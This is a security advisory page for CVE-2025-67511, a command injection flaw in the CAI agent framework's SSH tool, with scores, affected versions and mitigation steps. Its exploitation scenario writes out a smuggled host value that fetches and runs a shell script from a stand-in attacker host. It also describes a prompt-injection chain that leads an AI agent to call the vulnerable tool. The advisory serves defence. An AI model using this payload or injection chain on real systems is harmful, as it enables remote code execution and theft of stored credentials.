CVE-2025-67511 — CRITICAL (CVSS 9.6) AI Security Vulnerability

Q: Is CVE-2025-67511 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-67511, increasing the risk of exploitation.

Q: How to fix CVE-2025-67511?

1. IMMEDIATE: Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework. 2. WORKAROUND: Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level. 3. PATCH: Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged. 4. DETECTION: Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework. 5. CONTAINMENT: Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).

Q: What systems are affected by CVE-2025-67511?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, security automation pipelines, AI-driven offensive security tools, CI/CD with AI-assisted testing.

Q: What is the CVSS score for CVE-2025-67511?

CVE-2025-67511 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.11%.

CISO Take

If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.

Risk Assessment

CVSS 9.6 Critical with network attack vector, zero privileges required, and low complexity makes this highly exploitable against any exposed CAI agent instance. The absence of a patch compounds the risk. Mitigating factor: EPSS 0.00158 indicates low current exploitation in the wild, and exploitation requires user interaction or agent invocation. However, the target is a security automation framework — compromise of a defensive security tool has amplified blast radius, as these systems typically hold credentials and have privileged access to production infrastructure.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
cai-framework	pip	<= 0.5.9	No patch
cybersecurity_ai	—	—	No patch

Severity & Risk

CVSS 3.1

9.6 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 29% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Changed

C High

I High

A High

Recommended Action

5 steps

IMMEDIATE

Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework.
WORKAROUND

Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level.
PATCH

Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged.
DETECTION

Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework.
CONTAINMENT

Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Prompt Injection Agent Framework AML.T0011.002 - Poisoned AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0080 - AI Agent Context Poisoning

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

8.4 - AI system operation and monitoring A.9.3 - AI System Security Testing

NIST AI RMF

GOVERN-1.7 - Processes for decommissioning and oversight of AI systems GV-6.2 - AI System Security Practices MANAGE-2.4 - Residual risks are managed MS-2.5 - Risks from Third-Party AI Software and Dependencies

OWASP LLM Top 10

LLM01 - Prompt Injection LLM06 - Excessive Agency LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-67511?

If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.

Is CVE-2025-67511 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-67511, increasing the risk of exploitation.

How to fix CVE-2025-67511?

1. IMMEDIATE: Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework. 2. WORKAROUND: Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level. 3. PATCH: Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged. 4. DETECTION: Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework. 5. CONTAINMENT: Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).

What systems are affected by CVE-2025-67511?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, security automation pipelines, AI-driven offensive security tools, CI/CD with AI-assisted testing.

What is the CVSS score for CVE-2025-67511?

CVE-2025-67511 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.11%.

Technical Details

NVD Description

Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection; while username, host and port values are injectable. This issue does not have a fix at the time of publication.

Exploitation Scenario

An adversary conducting a penetration test or red team engagement using CAI >= 0.5.9 targets a security operations team also running CAI. Step 1: Attacker crafts a malicious target hostname — e.g., 'victim.com; curl attacker.com/shell.sh | bash' — and delivers it through a channel the victim's CAI agent will process (phishing lure, poisoned scan target list, or indirect prompt injection via agent context). Step 2: The CAI agent invokes run_ssh_command_with_credentials() with the attacker-controlled host value. Step 3: Because host is not sanitized, the shell executes both the SSH command and the injected payload. Step 4: Attacker achieves RCE on the machine running the security team's AI agent, potentially inheriting all stored SSH credentials and access to internal networks the agent was managing.